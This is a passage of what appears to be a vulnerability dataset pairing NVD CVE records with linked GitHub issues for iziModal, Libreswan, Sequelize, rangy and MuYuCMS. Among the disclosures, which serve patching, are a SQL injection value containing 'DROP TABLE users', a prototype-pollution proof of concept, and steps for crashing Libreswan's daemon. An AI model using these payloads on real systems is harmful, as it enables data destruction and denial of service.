"url": "https://securitylab.github.com/advisories/GHSL-2021-1044_iziModal/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/marcelodolza/iziModal/commit/01728ac52bac5c1b4512087dafe0ad8b091fdc9e"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/marcelodolza/iziModal/issues/249"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2021-1044_iziModal/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:izimodal_project:izimodal:*:*:*:*:*:*:*:*",
"matchCriteriaId": "24D048C4-A4EF-4509-94FF-2FF19CD3A7B4",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/marcelodolza/iziModal/issues/249 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"marcelodolza",
"iziModal"
] | Hello,
The [GitHub Security Lab team](https://securitylab.github.com/) has found a potential vulnerability in your project. Please create a [Security Advisory](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/creating-a-security-advisory) and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a [Security Policy](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/adding-a-security-policy-to-your-repository) containing a security email address to send the details to.
If you prefer to contact us by email, please reach out to securitylab@github.com with reference to GHSL-2021-1044.
Thank you,
@agustingianni
GitHub Security Lab
| GHSL-2021-1044: Security contact needed | https://api.github.com/repos/marcelodolza/iziModal/issues/249/comments | 2 | 2022-04-29T12:23:01Z | 2022-05-30T10:29:19Z | https://github.com/marcelodolza/iziModal/issues/249 | 1,220,691,279 | 249 | 4,755 |
CVE-2023-23009 | 2023-02-21T16:15:11.873 | Libreswan 4.9 allows remote attackers to cause a denial of service (assert failure and daemon restart) via crafted TS payload with an incorrect selector length. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/libreswan/libreswan/issues/954"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MFOIQX2LRL43P3GJT33DE7G7COHNXDN/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CSMYJH7MC2FZGCY5NH5AXULO3ISXIHOF/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5368"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/libreswan/libreswan/issues/954"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MFOIQX2LRL43P3GJT33DE7G7COHNXDN/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CSMYJH7MC2FZGCY5NH5AXULO3ISXIHOF/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5368"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libreswan:libreswan:4.9:*:*:*:*:*:*:*",
"matchCriteriaId": "6D49C745-4A03-4076-8F91-3AD698C1D1BD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/libreswan/libreswan/issues/954 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"libreswan",
"libreswan"
] | Hi, I found a bug in libreswan-4.9 which caused the pluto daemon to restart by sending several crafted IKEv2 messages to the server.
### process
first, send correct IKE_SA_INIT message and IKE_AUTH message so that the IPSEC_SA and CHILD_SA are established successfully.
then, send a REKEY_CHILD_SA message with an incorrect TSi payload. specifically, the Selector Length of the Traffic Selector need to be a different value from the real length(samller or larger, it doesn't matter). This will cause a crash when the server trys to parse this payload.
### my conf
conn ikev2_test
authby=secret
ike=aes128-sha1;modp1536
keyexchange=ike
phase2=esp
phase2alg=aes128-sha1
compress=no
pfs=no
auto=add
type=tunnel
left=192.168.100.31
leftnexthop=%defaultroute
right=192.168.100.30
rightnexthop=%defaultroute
### my pluto.log for parsing the REKEY_CHILD_SA message
when parsing 1 traffic selectors , the pluto restart
> Dec 20 06:04:47.516841: | *received 204 bytes from 192.168.100.30:36062 on ens33 192.168.100.31:500 using UDP
Dec 20 06:04:47.516901: | d8 ef b8 ef 3b 3a f8 a4 41 06 0f 82 7d 60 77 86
Dec 20 06:04:47.516904: | 2e 20 24 08 00 00 00 02 00 00 00 cc 29 00 00 b0
Dec 20 06:04:47.516906: | e6 8b 54 3f 30 cb cc 93 70 a6 79 47 ff c1 d3 7f
Dec 20 06:04:47.516908: | 83 6d d7 2b 44 b5 86 75 64 fb cb f0 f9 f3 e5 b7
Dec 20 06:04:47.516910: | 94 60 b4 26 3e 16 fc 6d 2d 76 9d 8e 82 11 59 c1
Dec 20 06:04:47.516911: | c3 5a 68 2c 01 5e 4f ed 8d b7 e7 56 b3 23 24 cc
Dec 20 06:04:47.516913: | dd bf e5 76 03 a3 33 36 83 5e 06 f2 71 bf 75 86
Dec 20 06:04:47.516915: | 07 f8 01 da 32 01 9e 89 9c aa a0 98 62 72 96 b8
Dec 20 06:04:47.516917: | 38 ef 32 31 1a 6f d2 50 d8 50 0f 92 49 cb 33 20
Dec 20 06:04:47.516919: | 4b 2c b0 7b f8 a4 8a ea 8f f8 ca 94 84 cf a7 ff
Dec 20 06:04:47.516921: | f1 e7 19 df c1 6b ae f9 6a c7 dc ca 3a dc ea 72
Dec 20 06:04:47.516923: | d5 08 2e 70 2f 79 15 52 a8 bf 07 ea fc 8b 3c 96
Dec 20 06:04:47.516925: | 26 0c cf 18 c3 44 f2 ea f2 09 af 5c
Dec 20 06:04:47.516933: | **parse ISAKMP Message:
Dec 20 06:04:47.516937: | initiator SPI: d8 ef b8 ef 3b 3a f8 a4
Dec 20 06:04:47.516940: | responder SPI: 41 06 0f 82 7d 60 77 86
Dec 20 06:04:47.516942: | next payload type: ISAKMP_NEXT_v2SK (0x2e)
Dec 20 06:04:47.516944: | ISAKMP version: IKEv2 version 2.0 (rfc4306/rfc5996) (0x20)
Dec 20 06:04:47.516946: | exchange type: ISAKMP_v2_CREATE_CHILD_SA (0x24)
Dec 20 06:04:47.516949: | flags: ISAKMP_FLAG_v2_IKE_INIT (0x8)
Dec 20 06:04:47.516952: | Message ID: 2 (00 00 00 02)
Dec 20 06:04:47.516955: | length: 204 (00 00 00 cc)
Dec 20 06:04:47.516957: | processing version=2.0 packet with exchange type=ISAKMP_v2_CREATE_CHILD_SA (36)
Dec 20 06:04:47.516960: | I am the IKE SA Original Responder receiving an IKEv2 CREATE_CHILD_SA request
Dec 20 06:04:47.516970: | State DB: found IKEv2 state #1 in ESTABLISHED_IKE_SA (find_v2_ike_sa)
Dec 20 06:04:47.516974: | #1 st.st_msgid_lastrecv 1 md.hdr.isa_msgid 00000002
Dec 20 06:04:47.516981: | Message ID: IKE #1 not a duplicate - message request 2 is new (SKEYSEED is known) (initiator: .sent=-1 .recv=-1 .recv_frags=0 .wip=-1 .last_sent=36587.248097 .last_recv=36587.248097 responder: .sent=1 .recv=1 .recv_frags=0 .wip=-1 .last_sent=36587.284336 .last_recv=36587.284331)
Dec 20 06:04:47.516983: | unpacking clear payload
Dec 20 06:04:47.516985: | Now let's proceed with payload (ISAKMP_NEXT_v2SK)
Dec 20 06:04:47.516988: | ***parse IKEv2 Encryption Payload:
Dec 20 06:04:47.516991: | next payload type: ISAKMP_NEXT_v2N (0x29)
Dec 20 06:04:47.516993: | flags: none (0x0)
Dec 20 06:04:47.516995: | length: 176 (00 b0)
Dec 20 06:04:47.516998: | processing payload: ISAKMP_NEXT_v2SK (len=172)
Dec 20 06:04:47.517002: | looking for transition from ESTABLISHED_IKE_SA matching CREATE_CHILD_SA request: SK (ignoring secured payloads)
Dec 20 06:04:47.517026: | trying: process rekey IKE SA request (CREATE_CHILD_SA)
Dec 20 06:04:47.517028: | matching by ignoring secured payloads
Dec 20 06:04:47.517088: | authenticator matched
Dec 20 06:04:47.517102: | stripping 4 octets as pad
Dec 20 06:04:47.517105: | #1 ikev2 ISAKMP_v2_CREATE_CHILD_SA decrypt success
Dec 20 06:04:47.517108: | Now let's proceed with payload (ISAKMP_NEXT_v2N)
Dec 20 06:04:47.517112: | **parse IKEv2 Notify Payload:
Dec 20 06:04:47.517114: | next payload type: ISAKMP_NEXT_v2SA (0x21)
Dec 20 06:04:47.517116: | flags: none (0x0)
Dec 20 06:04:47.517118: | length: 12 (00 0c)
Dec 20 06:04:47.517121: | Protocol ID: IKEv2_SEC_PROTO_ESP (0x3)
Dec 20 06:04:47.517123: | SPI size: 4 (04)
Dec 20 06:04:47.517126: | Notify Message Type: v2N_REKEY_SA (0x4009)
Dec 20 06:04:47.517128: | processing payload: ISAKMP_NEXT_v2N (len=4)
Dec 20 06:04:47.517130: | Now let's proceed with payload (ISAKMP_NEXT_v2SA)
Dec 20 06:04:47.517133: | **parse IKEv2 Security Association Payload:
Dec 20 06:04:47.517135: | next payload type: ISAKMP_NEXT_v2Ni (0x28)
Dec 20 06:04:47.517137: | flags: none (0x0)
Dec 20 06:04:47.517140: | length: 44 (00 2c)
Dec 20 06:04:47.517142: | processing payload: ISAKMP_NEXT_v2SA (len=40)
Dec 20 06:04:47.517144: | Now let's proceed with payload (ISAKMP_NEXT_v2Ni)
Dec 20 06:04:47.517146: | **parse IKEv2 Nonce Payload:
Dec 20 06:04:47.517148: | next payload type: ISAKMP_NEXT_v2TSi (0x2c)
Dec 20 06:04:47.517149: | flags: none (0x0)
Dec 20 06:04:47.517152: | length: 36 (00 24)
Dec 20 06:04:47.517154: | processing payload: ISAKMP_NEXT_v2Ni (len=32)
Dec 20 06:04:47.517156: | Now let's proceed with payload (ISAKMP_NEXT_v2TSi)
Dec 20 06:04:47.517158: | **parse IKEv2 Traffic Selector - Initiator - Payload:
Dec 20 06:04:47.517160: | next payload type: ISAKMP_NEXT_v2TSr (0x2d)
Dec 20 06:04:47.517162: | flags: none (0x0)
Dec 20 06:04:47.517164: | length: 24 (00 18)
Dec 20 06:04:47.517166: | number of TS: 1 (01)
Dec 20 06:04:47.517168: | processing payload: ISAKMP_NEXT_v2TSi (len=16)
Dec 20 06:04:47.517170: | Now let's proceed with payload (ISAKMP_NEXT_v2TSr)
Dec 20 06:04:47.517173: | **parse IKEv2 Traffic Selector - Responder - Payload:
Dec 20 06:04:47.517175: | next payload type: ISAKMP_NEXT_v2NONE (0x0)
Dec 20 06:04:47.517177: | flags: none (0x0)
Dec 20 06:04:47.517179: | length: 24 (00 18)
Dec 20 06:04:47.517181: | number of TS: 1 (01)
Dec 20 06:04:47.517183: | processing payload: ISAKMP_NEXT_v2TSr (len=16)
Dec 20 06:04:47.517187: | looking for transition from ESTABLISHED_IKE_SA matching CREATE_CHILD_SA request: SK{N(REKEY_SA),SA,Ni,TSi,TSr}
Dec 20 06:04:47.517189: | trying: process rekey IKE SA request (CREATE_CHILD_SA)
Dec 20 06:04:47.517191: | secured payloads do not match
Dec 20 06:04:47.517192: | trying: process rekey IKE SA response (CREATE_CHILD_SA)
Dec 20 06:04:47.517195: | message role does not match response
Dec 20 06:04:47.517197: | trying: process rekey Child SA request (CREATE_CHILD_SA)
Dec 20 06:04:47.517198: | secured message matched
Dec 20 06:04:47.517201: | selected state microcode process rekey Child SA request (CREATE_CHILD_SA)
Dec 20 06:04:47.517205: | #1 updating local interface from 192.168.100.31:500 to 192.168.100.31:500 using md->iface (update_ike_endpoints() +2598 /programs/pluto/state.c)
Dec 20 06:04:47.517210: | #1.st_v2_transition PARENT_R1->ESTABLISHED_IKE_SA -> ESTABLISHED_IKE_SA->ESTABLISHED_IKE_SA (v2_dispatch() +2292 /programs/pluto/ikev2.c)
Dec 20 06:04:47.517215: | Message ID: IKE #1 responder starting message request 2 (initiator: .sent=-1 .recv=-1 .recv_frags=0 .wip=-1 .last_sent=36587.248097 .last_recv=36587.248097 responder: .sent=1 .recv=1 .recv_frags=0 .wip=2 .last_sent=36587.284336 .last_recv=36587.284331)
Dec 20 06:04:47.517218: | calling processor process rekey Child SA request (CREATE_CHILD_SA)
Dec 20 06:04:47.517221: | CREATE_CHILD_SA IPsec SA rekey Protocol IKEv2_SEC_PROTO_ESP
Dec 20 06:04:47.517223: | parsing 4 raw bytes of IKEv2 Notify Payload into SPI
Dec 20 06:04:47.517229: | SPI
Dec 20 06:04:47.517232: | 0d bb 3a 00 ..:.
Dec 20 06:04:47.517234: | CREATE_CHILD_S to rekey IPsec SA(0x0dbb3a00) Protocol IKEv2_SEC_PROTO_ESP
Dec 20 06:04:47.517237: | v2 CHILD SA #2 found using their inbound (our outbound) SPI, in STATE_V2_ESTABLISHED_CHILD_SA
Dec 20 06:04:47.517239: | State DB: found IKEv2 state #2 in ESTABLISHED_CHILD_SA (find_v2_child_sa_by_outbound_spi)
Dec 20 06:04:47.517242: | #1 hasa a rekey request for "ikev2_test" #2 TSi TSr
Dec 20 06:04:47.517246: | addref fd@NULL (duplicate_state() +1538 /programs/pluto/state.c)
Dec 20 06:04:47.517252: | entry state hash_table_entries.serialno@0x55a1f6e50ea8 "ikev2_test" #3 initialized
Dec 20 06:04:47.517255: | entry state hash_table_entries.connection_serialno@0x55a1f6e50ea8 $2 initialized
Dec 20 06:04:47.517257: | entry state hash_table_entries.reqid@0x55a1f6e50ea8 "ikev2_test" #3: reqid=0 initialized
Dec 20 06:04:47.517261: | entry state hash_table_entries.ike_initiator_spi@0x55a1f6e50ea8 "ikev2_test" #3: 00 00 00 00 00 00 00 00 initialized
Dec 20 06:04:47.517264: | entry state hash_table_entries.ike_spis@0x55a1f6e50ea8 "ikev2_test" #3: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 initialized
Dec 20 06:04:47.517266: | creating state object #3 at 0x55a1f6e50ea8
Dec 20 06:04:47.517283: | entry state hash_table_entries.serialno@0x55a1f6e50ea8 "ikev2_test" #3 added to hash table bucket 0x55a1f5778b20
Dec 20 06:04:47.517286: | entry state hash_table_entries.connection_serialno@0x55a1f6e50ea8 $2 added to hash table bucket 0x55a1f5774ea0
Dec 20 06:04:47.517289: | entry state hash_table_entries.reqid@0x55a1f6e50ea8 "ikev2_test" #3: reqid=0 added to hash table bucket 0x55a1f576e0a0
Dec 20 06:04:47.517292: | entry state hash_table_entries.ike_initiator_spi@0x55a1f6e50ea8 "ikev2_test" #3: d8 ef b8 ef 3b 3a f8 a4 added to hash table bucket 0x55a1f576dbc0
Dec 20 06:04:47.517295: | entry state hash_table_entries.ike_spis@0x55a1f6e50ea8 "ikev2_test" #3: d8 ef b8 ef 3b 3a f8 a4 41 06 0f 82 7d 60 77 86 added to hash table bucket 0x55a1f57671c0
Dec 20 06:04:47.517298: | pstats #3 ikev2.child started
Dec 20 06:04:47.517301: | duplicating state object #1 "ikev2_test" as #3 for IPSEC SA
Dec 20 06:04:47.517304: | #3 setting local endpoint to 192.168.100.31:500 from #1.st_localport (duplicate_state() +1553 /programs/pluto/state.c)
Dec 20 06:04:47.517310: | child state #3: UNDEFINED(ignore) => REKEY_CHILD_R0(established IKE SA)
Dec 20 06:04:47.517313: | #3.st_v2_transition NULL -> REKEY_CHILD_R0->ESTABLISHED_CHILD_SA (new_v2_child_state() +1636 /programs/pluto/state.c)
Dec 20 06:04:47.517317: | constructing ESP/AH proposals with default DH NONE for ikev2_test (Child SA proposals (initiating rekey))
Dec 20 06:04:47.517322: | converting proposal AES_CBC_128-HMAC_SHA1_96 to ikev2 ...
Dec 20 06:04:47.517328: | ... ikev2_proposal: 1:ESP=AES_CBC_128-HMAC_SHA1_96-NONE-ENABLED+DISABLED
Dec 20 06:04:47.517331: | TSi: parsing 1 traffic selectors
Dec 20 06:04:48.074282: | releasing whack fd@(nil) for (main() +1602 /programs/pluto/plutomain.c)
Dec 20 06:04:48.074334: | delref fd@NULL (main() +1602 /programs/pluto/plutomain.c)
Dec 20 06:04:48.074348: | delref fd@NULL (main() +1602 /programs/pluto/plutomain.c)
Dec 20 06:04:48.074360: | checking IKEv1 state table
### related code in ikev2_ts.c
I think this is the code that causes the error. When parsing an incorrect TSi payload with wrong selecter length, pbs_in_struct return early, so the ts_body_pbs is not initialized.
struct ikev2_ts_header ts_h;
struct pbs_in ts_body_pbs;
d = pbs_in_struct(&ts_pd->pbs, &ikev2_ts_header_desc,
&ts_h, sizeof(ts_h), &ts_body_pbs);
switch (ts_h.isath_type) {
case IKEv2_TS_IPV4_ADDR_RANGE:
case IKEv2_TS_IPV6_ADDR_RANGE:
{
ts->ipprotoid = ts_h.isath_ipprotoid;
/* read and fill in port range */
struct ikev2_ts_portrange pr;
d = pbs_in_struct(&ts_body_pbs, &ikev2_ts_portrange_desc,
&pr, sizeof(pr), NULL);
I also tested several other versions, it seems to have the same problem in libreswan 4.5 - 4.8 | abnormal TS payload causes pluto daemon to restart in libreswan 4.9 | https://api.github.com/repos/libreswan/libreswan/issues/954/comments | 15 | 2022-12-20T14:48:29Z | 2023-05-03T22:45:18Z | https://github.com/libreswan/libreswan/issues/954 | 1,504,686,383 | 954 | 4,756 |
CVE-2023-25813 | 2023-02-22T19:15:11.777 | Sequelize is a Node.js ORM tool. In versions prior to 6.19.1 a SQL injection exploit exists related to replacements. Parameters which are passed through replacements are not properly escaped which can lead to arbitrary SQL injection depending on the specific queries in use. The issue has been fixed in Sequelize 6.19.1. Users are advised to upgrade. Users unable to upgrade should not use the `replacements` and the `where` option in the same query. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/sequelize/sequelize/commit/ccaa3996047fe00048d5993ab2dd43ebadd4f78b"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/sequelize/sequelize/issues/14519"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/sequelize/sequelize/releases/tag/v6.19.1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-wrh9-cjv3-2hpw"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/sequelize/sequelize/commit/ccaa3996047fe00048d5993ab2dd43ebadd4f78b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/sequelize/sequelize/issues/14519"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/sequelize/sequelize/releases/tag/v6.19.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-wrh9-cjv3-2hpw"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sequelizejs:sequelize:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "17071F43-EBB2-4A3C-ACD4-8914666046E8",
"versionEndExcluding": "6.19.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/sequelize/sequelize/issues/14519 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"sequelize",
"sequelize"
] | Hi everyone 👋
We have recently released Sequelize 6.19.1 (since patched as 6.19.2) which includes a [breaking change](https://github.com/sequelize/sequelize/pull/14472).
We normally want to fully respect semver rules, unfortunately a very serious [SQL injection exploit](https://github.com/sequelize/sequelize/issues/13817) has surfaced and it was impossible for us to fix it without introducing a breaking change. We considered the issue serious enough to break the rule and release the fix in V6. Most of you are going to be completely unaffected, but a small percentage of users may experience breakage with this version, more below
## The exploit
The SQL injection exploit is related to replacements. Here is such an example:
In the following query, some parameters are passed through replacements, and some are passed directly through the `where` option.
```typescript
User.findAll({
where: or(
literal('soundex("firstName") = soundex(:firstName)'),
{ lastName: lastName },
),
replacements: { firstName },
})
```
This is a very legitimate use case, but this query was vulnerable to SQL injection due to how Sequelize processed the query: Sequelize built a first query using the `where` option, then passed it over to `sequelize.query` which parsed the resulting SQL to inject all `:replacements`.
If the user passed values such as
```json
{
"firstName": "OR true; DROP TABLE users;",
"lastName": ":firstName"
}
```
Sequelize would first generate this query:
```sql
SELECT * FROM users WHERE soundex("firstName") = soundex(:firstName) OR "lastName" = ':firstName'
```
Then would inject replacements in it, which resulted in this:
```sql
SELECT * FROM users WHERE soundex("firstName") = soundex('OR true; DROP TABLE users;') OR "lastName" = ''OR true; DROP TABLE users;''
```
As you can see this resulted in arbitrary user-provided SQL being executed.
## The solution & breaking change
The way to fix this without breaking everyone's codebase was to use a smarter SQL parser that would only inject replacements in places where native SQL parameters are allowed (with some safe exceptions to stay as backward compatible as possible).
This means that `:replacements` will not be treated as such anymore if they are quoted, as we treat it as being part of a SQL string.
Details here: https://github.com/sequelize/sequelize/blob/v6/test/unit/utils/sql.test.js
On top of this, in Sequelize 7, we rewrote this system completely to handle both steps at the same time. Removing all risk of SQL injection (https://github.com/sequelize/sequelize/pull/14447).
Some of you relied on this to inject parameters inside of sql strings, which is why this can be considered a breaking change.
Note however that doing that was not safer than simply concatenating, and it being done by us may have given you a false sense of security regarding input sanitization.
---
Once again, we are very sorry for the inconvenience this causes.
\- Zoé | PSA: Upgrade to Sequelize >= 6.19.2 & Our recent breaking change in v6 | https://api.github.com/repos/sequelize/sequelize/issues/14519/comments | 14 | 2022-05-18T16:31:34Z | 2022-07-14T15:52:38Z | https://github.com/sequelize/sequelize/issues/14519 | 1,240,213,099 | 14,519 | 4,757 |
CVE-2023-26102 | 2023-02-24T05:15:15.140 | All versions of the package rangy are vulnerable to Prototype Pollution when using the extend() function in file rangy-core.js.The function uses recursive merge which can lead an attacker to modify properties of the Object.prototype
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/timdown/rangy/issues/478"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-RANGY-3175702"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/timdown/rangy/issues/478"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-RANGY-3175702"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rangy_project:rangy:-:*:*:*:*:node.js:*:*",
"matchCriteriaId": "C72BDE1F-4591-4BB6-BC9D-83C066420528",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/timdown/rangy/issues/478 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"timdown",
"rangy"
] | Affected versions of this package are vulnerable to Prototype Pollution. Rangy runs the risk of Prototype Pollution when using the function extend in file rangy-core.js.The function use recursive mergelead an attacker to modify properties of the Object.prototype.the risk locate is in here:https://github.com/timdown/rangy/blob/8aea7eb14b31d9c7240ce539544bef9337a8b597/lib/rangy-core.js#L167
https://github.com/timdown/rangy/blob/8aea7eb14b31d9c7240ce539544bef9337a8b597/lib/rangy-core.js#L165
and the POC is as follow:
var rangy= require("rangy")
BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');
console.log({}.test) //undefined
rangy.util.extend({},BAD_JSON,{})
console.log({}.test) //"123" | Prototype pollution in function extend in the file rangy-core.js | https://api.github.com/repos/timdown/rangy/issues/478/comments | 8 | 2022-12-19T06:54:55Z | 2023-12-01T15:55:40Z | https://github.com/timdown/rangy/issues/478 | 1,502,407,613 | 478 | 4,758 |
CVE-2023-1002 | 2023-02-24T08:15:11.243 | A vulnerability, which was classified as problematic, has been found in MuYuCMS 2.2. This issue affects some unknown processing of the file index.php. The manipulation of the argument file_path leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221735. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
